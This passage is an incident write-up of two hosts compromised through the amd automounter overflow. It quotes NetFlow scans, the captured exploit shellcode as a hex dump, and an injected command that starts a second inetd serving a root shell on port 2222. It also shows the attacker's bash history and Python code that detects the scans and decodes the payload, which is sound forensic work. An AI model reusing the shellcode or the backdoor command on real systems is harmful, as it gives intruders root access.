Security Analysis of AMD Hacking (Case I)


Summary


The attackers first swept the 137.189 network for sunrpc (111/tcp). They compromised two hosts through the buffer overflow in amd (the Berkeley Automounter Daemon, RPC program 300019) and then planted a backdoor on 2222/tcp: the exploit payload writes a one-line inetd configuration into /tmp/h and starts a second instance of /usr/sbin/inetd with that file as its configuration, so every connection to port 2222 is answered with a root shell.

After the break-in they defaced victim1's home page and used victim2 to scan other networks.

See
http://www.cert.org/incident_notes/IN-99-05.html
http://www.cert.org/advisories/CA-99-12-amd.html


Chronology

Jan 12 and 14
Jan 15
Jan 16
Jan 17
Jan 18
Jan 19
Jan 20
Jan 21

Jan 12 and 14
Our router NetFlow log had already picked up sunrpc traffic to victim1 before the break-in. The rows below are a sunrpc sweep, equivalent to running "rpcinfo -p" against every host: a single source (xxx.yyy.33.139) sends one 60-byte packet to 111/tcp on consecutive 137.189.94.x addresses within the same second, with the source port stepping in lockstep with the target address (1050 for .207, 1051 for .208, and so on), the signature of a sequential scanner.

Start Time         End Time            Source            Destination         Src port            Dst port       Pkts   Oct
===========================================================================================================================
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.211      1054(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.209      1052(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.210      1053(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.224      1067(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.208      1051(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.207      1050(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.205      1048(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.233      1076(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.203      1046(         )   111 ( sunrpc  )    1     60
0112.07:55:50.266  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.201      1044(         )   111 ( sunrpc  )    2    120
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.234      1077(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.202      1045(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.204      1047(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.213      1056(         )   111 ( sunrpc  )    1     60
0112.07:55:50.270  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.215      1058(         )   111 ( sunrpc  )    2    120
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.214      1057(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.219      1062(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.218      1061(         )   111 ( sunrpc  )    1     60
0112.07:55:50.270  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.220      1063(         )   111 ( sunrpc  )    2    120
0112.07:55:49.466  0112.07:55:53.594   xxx.yyy.33.139  137.189.94.135      4947(         )   111 ( sunrpc  )    3    156
0112.07:55:49.470  0112.07:55:53.594   xxx.yyy.33.139  137.189.94.138      4950(         )   111 ( sunrpc  )    3    120
0112.07:55:49.502  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.154      4989(         )   111 ( sunrpc  )    6    364
0112.07:55:49.274  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.155      4967(         )   111 ( sunrpc  )    4    216
0112.07:55:49.274  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.153      4965(         )   111 ( sunrpc  )    4    216
0112.07:55:49.266  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.154      4966(         )   111 ( sunrpc  )    4    216
0112.07:55:47.694  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.87       4899(         )   111 ( sunrpc  )    5    240
0112.07:55:47.694  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.86       4898(         )   111 ( sunrpc  )    5    276


0112.07:56:20.262  0112.07:56:28.834  xxx.yyy.33.139    137.189.victim1   2369 (         )     111 ( sunrpc  )    5     268
0112.07:56:20.678  0112.07:56:26.462  xxx.yyy.33.139    137.189.victim1   2699 (         )     111 ( sunrpc  )    6     364

0114.21:51:58.779  0114.21:51:59.79   aa.bb.6.29        137.189.victim1   1976 (         )     111 ( sunrpc  )    3     156



In total, at least three sources (ccc.dd.101.162, aa.bb.6.29 and xxx.yyy.33.139) port-scanned the 137.189 network between 12 and 17 Jan.


Jan 15
This is the day victim1 and victim2 were compromised. First the attacker (from ccc.dd.101.162) enumerated the RPC services on victim1 with an "rpcinfo -p"-style portmapper query:
0115.08:39:15.319  0115.08:39:17.431  ccc.dd.101.162    137.189.victim1    758 ( nlogin  )     111 ( sunrpc  )    6     288
0115.08:39:15.31   0115.08:39:17.419  ccc.dd.101.162    137.189.victim1  13665 (         )     111 ( sunrpc  )    3     120

0115.08:39:02.231  0115.08:39:06.351   ccc.dd.101.162  137.189.victim2   06    6206(         )   111 ( sunrpc  )    5    204
0115.08:39:03.511  0115.08:39:06.367   ccc.dd.101.162  137.189.victim2   06     690(         )   111 ( sunrpc  )    6    288

Bingo! amd is registered with the portmapper on both hosts (program 300019: 656/tcp and 657/udp on victim1, 637/tcp and 638/udp on victim2). Anyone on the network can get the same listing:
# rpcinfo -p victim1.ie.cuhk.edu.hk
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp   1017  status
    100024    1   tcp   1019  status
    100011    1   udp    604  rquotad
    100011    2   udp    604  rquotad
    100005    1   udp    614  mountd
    100005    1   tcp    616  mountd
    100005    2   udp    619  mountd
    100005    2   tcp    621  mountd
    100005    3   udp    624  mountd
    100005    3   tcp    626  mountd
    100003    2   udp   2049  nfs
    100021    1   udp   1026  nlockmgr
    100021    3   udp   1026  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    656  amd
    300019    1   udp    657  amd



# /usr/sbin/rpcinfo -p victim2.ie.cuhk.edu.hk
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp   1000  status
    100024    1   tcp   1002  status
    100011    1   udp   1011  rquotad
    100011    2   udp   1011  rquotad
    100005    1   udp   1021  mountd
    100005    1   tcp   1023  mountd
    100005    2   udp    602  mountd
    100005    2   tcp    604  mountd
    100005    3   udp    607  mountd
    100005    3   tcp    609  mountd
    100003    2   udp   2049  nfs
    100021    1   udp   1024  nlockmgr
    100021    3   udp   1024  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    637  amd
    300019    1   udp    638  amd


At 18:42 the attacker came back, this time going straight for amd: 5480 octets in five UDP packets to port 657 (the amd port the portmapper had just reported), followed six seconds later by a TCP connection from the same source to port 2222, a port nothing on victim1 should have been listening on. Three minutes later the same sequence hit victim2 (2192 octets to its amd port 638, then a connection to 2222):
0115.18:42:26.179  0115.18:42:46.223  ccc.dd.101.162    137.189.victim1    653 (         )     657 (  amd    )    5    5480
0115.18:42:32.659  0115.18:43:15.67   ccc.dd.101.162    137.189.victim1  31321 (         )    2222 (         )    7     299

0115.18:45:51.282  0115.18:45:56.302   ccc.dd.101.162  137.189.victim2   11     692(         )   638 (         )    2   2192
0115.18:45:50.766  0115.18:45:50.766   ccc.dd.101.162  137.189.victim2   11     691(         )   111 ( sunrpc  )    1     84
0115.18:45:52.718  0115.18:45:59.958   ccc.dd.101.162  137.189.victim2   06   31369(         )  2222 (         )    7    299
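The two patterns in the NetFlow records above, the 111/tcp sweep on Jan 12 and the large UDP flow to the amd port followed within seconds by a connection to 2222/tcp, can be picked out mechanically. The following Python is an added example for this write-up, not a tool the author or the attackers used. It parses rows in the router's column format (including the stray extra column on the victim2 rows) and assumes the year 2000 and the alert thresholds shown; the sample rows are transcribed from the tables on this page.

```python
"""Detection logic over the router NetFlow rows quoted in this write-up.
Added example for this page; it is not a tool the author or the attackers
used. SAMPLE_FLOWS is a subset of rows transcribed from the page (the Jan 12
sweep, the Jan 14 probe and the Jan 15 exploit of victim1 and victim2). The
year (2000) and the alert thresholds are assumptions chosen to fit those rows.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

SAMPLE_FLOWS = """\
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.211      1054(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.209      1052(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.210      1053(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.224      1067(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.208      1051(         )   111 ( sunrpc  )    1     60
0112.07:55:49.466  0112.07:55:53.594   xxx.yyy.33.139  137.189.94.135      4947(         )   111 ( sunrpc  )    3    156
0114.21:51:58.779  0114.21:51:59.79   aa.bb.6.29        137.189.victim1   1976 (         )     111 ( sunrpc  )    3     156
0115.18:42:26.179  0115.18:42:46.223  ccc.dd.101.162    137.189.victim1    653 (         )     657 (  amd    )    5    5480
0115.18:42:32.659  0115.18:43:15.67   ccc.dd.101.162    137.189.victim1  31321 (         )    2222 (         )    7     299
0115.18:45:51.282  0115.18:45:56.302   ccc.dd.101.162  137.189.victim2   11     692(         )   638 (         )    2   2192
0115.18:45:50.766  0115.18:45:50.766   ccc.dd.101.162  137.189.victim2   11     691(         )   111 ( sunrpc  )    1     84
0115.18:45:52.718  0115.18:45:59.958   ccc.dd.101.162  137.189.victim2   06   31369(         )  2222 (         )    7    299
"""

# start end src dst [stray column] sport(name) dport(name) pkts octets
ROW = re.compile(
    r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+"
    r"(?:\d+\s+)?"
    r"(\d+)\s*\(([^)]*)\)\s+(\d+)\s*\(([^)]*)\)\s+(\d+)\s+(\d+)$")


@dataclass
class Flow:
    start: datetime
    end: datetime
    src: str
    dst: str
    sport: int
    sname: str
    dport: int
    dname: str
    pkts: int
    octets: int


def _ts(field, year):
    # "0112.07:55:53.262" is MMDD.HH:MM:SS.fraction; the log carries no year
    return datetime.strptime(f"{year}{field}", "%Y%m%d.%H:%M:%S.%f")


def parse_flows(text, year=2000):
    flows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        s, e, src, dst, sp, sn, dp, dn, pk, oc = m.groups()
        flows.append(Flow(_ts(s, year), _ts(e, year), src, dst, int(sp),
                          sn.strip(), int(dp), dn.strip(), int(pk), int(oc)))
    return flows


def find_port_sweeps(flows, port=111, min_hosts=5, window=timedelta(minutes=5)):
    """One source touching `port` on >= min_hosts distinct hosts within `window`."""
    by_src = defaultdict(list)
    for f in flows:
        if f.dport == port:
            by_src[f.src].append(f)
    alerts = []
    for src, fl in by_src.items():
        fl.sort(key=lambda f: f.start)
        best, lo = 0, 0
        for hi in range(len(fl)):
            while fl[hi].start - fl[lo].start > window:
                lo += 1
            best = max(best, len({f.dst for f in fl[lo:hi + 1]}))
        if best >= min_hosts:
            alerts.append((src, best))
    return alerts


def find_exploit_then_backdoor(flows, min_octets=2000, grace=timedelta(minutes=2)):
    """A large payload to a service port, then a flow from the same source to a
    port the router has no service name for on the same host (the new listener)."""
    alerts = []
    for f in flows:
        if f.octets < min_octets:
            continue
        for g in flows:
            if (g.src == f.src and g.dst == f.dst and g.dport != f.dport
                    and g.dname == "" and timedelta(0) <= g.start - f.start <= grace):
                alerts.append((f.src, f.dst, f.dport, g.dport))
    return alerts


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    print("sweeps:", find_port_sweeps(flows))
    print("exploit then backdoor:", find_exploit_then_backdoor(flows))
```

On the sample rows the sweep detector reports xxx.yyy.33.139 touching six hosts on port 111, and the second detector pairs the 5480-octet flow to 657 with the 2222 connection on victim1 and the 2192-octet flow to 638 with the 2222 connection on victim2. The "unnamed destination port" heuristic is only as good as the router's service table; on a real network, compare against the ports the portmapper and netstat say the host should have open.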
From victim1's system log we pick up this entry: amq logged a mount request whose path is the exploit payload itself. The ~P characters are 0x90 (the x86 NOP) shown with the high bit marked, i.e. the NOP sled; the "ë(" that follows is 0xeb 0x28, the first instruction of the shellcode, matching the hex dump further down:
Jan 15 18:50:08 victim1 27>Jan 15 18:50:08 amd[479]: amq requested mount of ~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~Pë(^~M^^P~I^^~CÃ^H~I^^D~CÃ^C~I^^H~Cë^K~M^N~IÊ3À~IF^L~HF^W~HF^Z°^KÍ~@èÓÿÿÿ18 Jan
 1998--str/bin/sh(-c)/bin/echo '2222        stream  tcp     nowait  root    /bin/sh s
Jan 15 18:50:08 victim1 p/h;/usr/sbin/inetd /tmp/h &#~PÒòÿ¿Òòÿ¿^C
Jan 15 19:05:22 victim1 rz[25410]: [root] amdex/ZMODEM: 12716 Bytes, 3999 BPS
Jan 15 19:05:24 victim1 rz[25410]: [root] pscan.c/ZMODEM: 4805 Bytes, 3759 BPS
Jan 15 19:09:46 victim1 rz[25467]: [root] ben.c/ZMODEM: 1536 Bytes, 1972 BPS

When you look at the tcpdump the same payload is readable as hex. (The IP header of the second packet, source c0a8 8054 and destination c0a8 8032, decodes to 192.168.128.84 and 192.168.128.50, so this capture appears to have been taken on the private investigation network as a replay of the exploit rather than during the original attack; the destination port differs from 657 because amd's port is assigned by the portmapper each time it starts.)
14:09:19.621925 eth0 < ntec84.1027 > victim.711: udp 1068
.....
.....
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 eb28      ...............(
                5e8d 5e10 891e 83c3 0889 5e04 83c3 0389      ^.^.......^.....
                5e08 83eb 0b8d 0e89 ca33 c089 460c 8846      ^........3..F..F
                1788 461a b00b cd80 e8d3 ffff ff31 3820      ..F..........18 
                4a61 6e20 3139 3938 2d2d 7374 722f 6269      Jan 1998--str/bi
                6e2f 7368 282d 6329 2f62 696e 2f65 6368      n/sh(-c)/bin/ech
                6f20 2732 3232 3220 2020 2020 2020 2073      o '2222        s
                7472 6561 6d20 2074 6370 2020 2020 206e      tream  tcp     n
                6f77 6169 7420 2072 6f6f 7420 2020 202f      owait  root    /
                6269 6e2f 7368 2073 6820 2d69 273e 3e20      bin/sh sh -i'>> 
                2f74 6d70 2f68 3b2f 7573 722f 7362 696e      /tmp/h;/usr/sbin
                2f69 6e65 7464 202f 746d 702f 6820 2623      /inetd /tmp/h &#
                90d2 f2ff bfd2 f2ff bfd2 f2ff bfd2 f2ff      ................
                bfd2 f2ff bf00 0000                          ........

14:09:21.611670 eth0 < ntec84.1098 > victim.2222: S 2946836865:2946836865(0) win 32120  (DF)
                4500 003c 1342 4000 4006 a5a2 c0a8 8054      E..<.B@.@......T
                c0a8 8032 044a 08ae afa5 2981 0000 0000      ...2.J....).....
                a002 7d78 d5b3 0000 0204 05b4 0402 080a      ..}x............
                0b5e 8186 0000 0000 0103 0300                .^..........

Note that victim1's clock ran about 8 minutes fast, which is why the syslog entry is stamped 18:50 while the router saw the packets at 18:42.

So the attacker overflowed amd and had the shellcode run /bin/sh -c with this command, exactly as it appears in the dump:

/bin/echo '2222        stream  tcp     nowait  root    /bin/sh sh -i'>> /tmp/h;/usr/sbin/inetd /tmp/h &#

The echo appends one inetd.conf line to /tmp/h: service port 2222, stream socket, tcp, nowait, run as root, server /bin/sh with argv "sh -i". Then /usr/sbin/inetd is started a second time, backgrounded, with /tmp/h as its configuration file; the trailing # turns the return-address bytes that follow the command in the packet into a shell comment, since the shellcode never terminates that string. From 18:50:08 on, anyone who connects to 2222/tcp gets an interactive root shell on victim1. After the fact this is easy to spot: ps shows a second "/usr/sbin/inetd /tmp/h" and netstat shows a LISTEN on 2222, which is worth checking on any host whose amd port was reachable.
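The hex dump can be decoded mechanically, which is the quickest way to confirm what a captured payload would have executed without running it. The Python below is an added example for this write-up (not the attacker's tool and not code from CERT): it reassembles the bytes from tcpdump's hex columns, measures the NOP sled, follows the jmp/call/pop trick to the string block, recovers the argv the shellcode passes to execve, and extracts the repeated return address. The hex lines are transcribed from the dump above; the NOP lines hidden behind "....." there are not included, so the sled length is for the shown part only.

```python
"""Decoder for the exploit packet's UDP payload as printed by tcpdump -x.
Added example for the write-up, not the attacker's tool and not CERT code.
HEX_DUMP is transcribed from the hex dump quoted on this page (the NOP lines
elided by '.....' there are not included, so the sled length is for the
shown portion only)."""
import re
import struct

HEX_DUMP = """\
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 9090
9090 9090 9090 9090 9090 9090 9090 eb28
5e8d 5e10 891e 83c3 0889 5e04 83c3 0389
5e08 83eb 0b8d 0e89 ca33 c089 460c 8846
1788 461a b00b cd80 e8d3 ffff ff31 3820
4a61 6e20 3139 3938 2d2d 7374 722f 6269
6e2f 7368 282d 6329 2f62 696e 2f65 6368
6f20 2732 3232 3220 2020 2020 2020 2073
7472 6561 6d20 2074 6370 2020 2020 206e
6f77 6169 7420 2072 6f6f 7420 2020 202f
6269 6e2f 7368 2073 6820 2d69 273e 3e20
2f74 6d70 2f68 3b2f 7573 722f 7362 696e
2f69 6e65 7464 202f 746d 702f 6820 2623
90d2 f2ff bfd2 f2ff bfd2 f2ff bfd2 f2ff
bfd2 f2ff bf00 0000
"""

HEX_GROUP = re.compile(r"[0-9a-f]{2}(?:[0-9a-f]{2})?")


def hexdump_to_bytes(dump: str) -> bytes:
    """Collect the hex groups at the start of each tcpdump line; stop at the
    first token that is not hex (the ASCII gutter or a timestamp header)."""
    out = bytearray()
    for line in dump.splitlines():
        for tok in line.split():
            if not HEX_GROUP.fullmatch(tok):
                break
            out += bytes.fromhex(tok)
    return bytes(out)


def analyse_payload(data: bytes) -> dict:
    """Pick the exploit apart: NOP sled, jmp/call/pop, execve, the string
    block the shellcode addresses relative to esi, and the return-address spray."""
    sled = len(data) - len(data.lstrip(b"\x90"))
    code = data[sled:]
    if code[0] != 0xEB:                       # jmp rel8 forward ...
        raise ValueError("no short jmp after the NOP sled")
    call_at = 2 + code[1]
    if code[call_at] != 0xE8:                 # ... onto a call rel32 back ...
        raise ValueError("jmp does not land on a call")
    rel32 = struct.unpack("<i", code[call_at + 1:call_at + 5])[0]
    pop_at = call_at + 5 + rel32
    if code[pop_at] != 0x5E:                  # ... whose target is pop esi
        raise ValueError("call does not land on pop esi")
    strings = code[call_at + 5:]              # esi = address of this block
    # xor eax,eax ; ... ; mov al,0x0b ; int 0x80 is execve on Linux/x86
    execve = b"\x33\xc0" in code[:call_at] and b"\xb0\x0b\xcd\x80" in code[:call_at]
    # First 16 bytes are scratch for the argv pointers; the code NUL-terminates
    # esi+0x17 and esi+0x1a, giving argv[0], argv[1] and an unterminated argv[2]
    # that runs up to the first 0x90 (the '#' at its end hides what follows).
    argv0 = strings[0x10:0x17]
    argv1 = strings[0x18:0x1a]
    end = strings.index(b"\x90", 0x1b)
    argv2 = strings[0x1b:end]
    tail = strings[end + 1:]
    ret = struct.unpack("<I", tail[:4])[0]
    ret_count = 0
    for i in range(0, len(tail) - 3, 4):      # count the repeated 4-byte address
        if struct.unpack("<I", tail[i:i + 4])[0] != ret:
            break
        ret_count += 1
    return {"nop_sled": sled, "execve": execve, "argv": [argv0, argv1, argv2],
            "ret_addr": ret, "ret_count": ret_count}


def inetd_entry(argv2: bytes) -> list:
    """The single-quoted text echoed into /tmp/h, split into inetd.conf fields:
    service, socket type, protocol, wait flag, user, server path, argv..."""
    m = re.search(rb"'([^']*)'", argv2)
    return m.group(1).decode().split() if m else []


if __name__ == "__main__":
    info = analyse_payload(hexdump_to_bytes(HEX_DUMP))
    print(f"NOP sled (shown part): {info['nop_sled']} bytes, execve: {info['execve']}")
    print("argv:", info["argv"])
    print(f"return address 0x{info['ret_addr']:08x} repeated {info['ret_count']} times")
    print("inetd.conf line:", inetd_entry(info["argv"][2]))
```

Run as a script it reports 206 NOPs in the shown part, execve("/bin/sh", ["/bin/sh", "-c", "/bin/echo '2222 ... sh -i'>> /tmp/h;/usr/sbin/inetd /tmp/h &#"]) and the stack address 0xbffff2d2 repeated five times after the command. The decoder is deliberately strict: it refuses payloads that do not follow the jmp/call/pop layout rather than guessing, which is the right default when triaging captures.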

Starting at 18:57:00, another attacker (possibly the same person from a different address), 63.14.53.109, connected to the 2222 backdoor on victim1 (97 packets, 22 KB) and then used victim1 to scan the 207.246.0.0/16 network:

0115.18:57:00.569  0115.18:58:52.533  63.14.53.109      137.189.victim1   1083 (         )    2222 (         )   97   22708
0115.19:00:49.724  0115.19:00:49.724  207.246.1.80      137.189.victim1    111 ( sunrpc  )    1594 (         )    1      40
0115.19:00:49.612  0115.19:00:49.612  207.246.1.75      137.189.victim1    111 ( sunrpc  )    1589 (         )    1      40
...
...
Between 19:00:49 and 19:16:46 the router logged 6578 such sunrpc flows! Note the direction: these records are the replies from 207.246.x.x hosts (source port 111 back to a high port on victim1, mostly a single 40-byte packet, i.e. a bare TCP header), so victim1 was the one scanning that network for port 111.
...
...

0115.19:16:46.965  0115.19:16:47.513  207.246.159.34    137.189.victim1    111 ( sunrpc  )     790 (         )    4     496
0115.19:16:46.797  0115.19:16:47.333  207.246.159.32    137.189.victim1    111 ( sunrpc  )     786 (         )    4     496
From the .bash_history we have some idea of what the attacker was doing at that time:
ls -l
/pwd
pwd
ls -l
pwd
uname -a; pwd;
ls
cd home
ls
cd httpd
ls
cd html
ls
./amdex 207.246.0.2
./amdex
chmod +x amdex
ls
./amdex
./amdex 207.246.0.2
./amdex 207.246.0.51
./amdex 207.246.1.3
./amdex 207.246.2.213
./amdex 207.246.2.253
./amdex 207.246.3.251
./amdex 207.246.3.254
./amdex 207.246.52.250
ls
ps ux
who
kill -9 26859
killall *
ps ux
kill -9 25479
ps ux
kill -9 25867
ps ux
ls
cd home
ls
cd httpd
ls
cd html
rz
ls
make pscan.c
ls
make pscan
ls
rm *.c
ls
./pscan
./pscan 207.246 111 &
ls
rz
make ben
ls
cat wuftp.log
./pscan 207.246 111 &
ps ux
ls
cat wuftp.log
cat wuftp.log
ps ux
sssls
ps ux
kill -9 25867
ps ux
kill -9 25866
ps ux
killall ./*
ls
ps ux
ls
rm ben*
ls
rm pscan
rm *.log


amdex, pscan and ben are the programs the attacker uploaded to victim1 with rz (see the rz entries in the message log above: amdex at 19:05:22, pscan.c at 19:05:24 and ben.c at 19:09:46, victim1 time).

amdex is presumably the amd exploit, the same kind of attack that was used against victim1, and pscan a port scanner: "./pscan 207.246 111 &" scans 207.246.0.0/16 for port 111, which is exactly the burst of sunrpc replies the router logged between 19:00 and 19:16.

First the attacker tried a handful of 207.246.x.x hosts with amdex. That does not seem to have been effective, so he killed the amdex processes and started pscan instead, presumably to find more hosts running the portmapper before trying amdex again. Because the attacker removed pscan, ben and their logs before leaving, we do not know exactly what they did on victim1.

With the 2222 backdoor open, at least 9 different sources visited victim1 over the following days, coming and going as they pleased.

At least 14 different sources visited victim2 between 15 and 20 Jan.

Wow...... What a party!


Jan 16

This is the day the victim1 web pages were changed.

Many visitors still came in through port 2222 that day:

0116.15:31:52.826  0116.15:32:18.770  xx.14.43.220      137.189.victim1   1107 (         )    2222 (         )    7     306
0116.15:40:20.265  0116.15:40:34.1    yyy.197.58.25     137.189.victim1   1959 (         )    2222 (         )    5     208
0116.15:41:24.957  0116.15:41:26.829  yyy.197.58.25     137.189.victim1   1959 (         )    2222 (         )    5     213
0116.15:46:37.649  0116.15:46:37.917  yyy.197.58.25     137.189.victim1   1959 (         )    2222 (         )    2      80
0116.16:34:26.144  0116.16:34:27.180  yyy.253.90.32     137.189.victim1   1138 (         )    2222 (         )    3     128
0116.16:33:58.680  0116.16:34:24.560  xx.14.43.220      137.189.victim1   1351 (equationb)    2222 (         )    8     328
0116.16:36:32.280  0116.16:37:51.344  xx.14.43.220      137.189.victim1   1353 (         )    2222 (         )   21     874
0116.16:36:47.399  0116.16:38:21.583  yyy.253.90.32     137.189.victim1   1138 (         )    2222 (         )    9     458
0116.16:39:07.903  0116.16:39:07.903  yyy.253.42.1      137.189.victim1      0 (         )    2816 (         )    1      56
0116.16:39:42.567  0116.16:39:45.639  xx.14.43.220      137.189.victim1   1353 (         )    2222 (         )    3     120
0116.16:40:35.191  0116.16:40:49.19   yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    6     254
0116.16:40:57.975  0116.16:40:57.975  yyy.253.42.1      137.189.victim1      0 (         )    2816 (         )    1      56
0116.16:46:09.702  0116.16:46:10.842  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    3     140
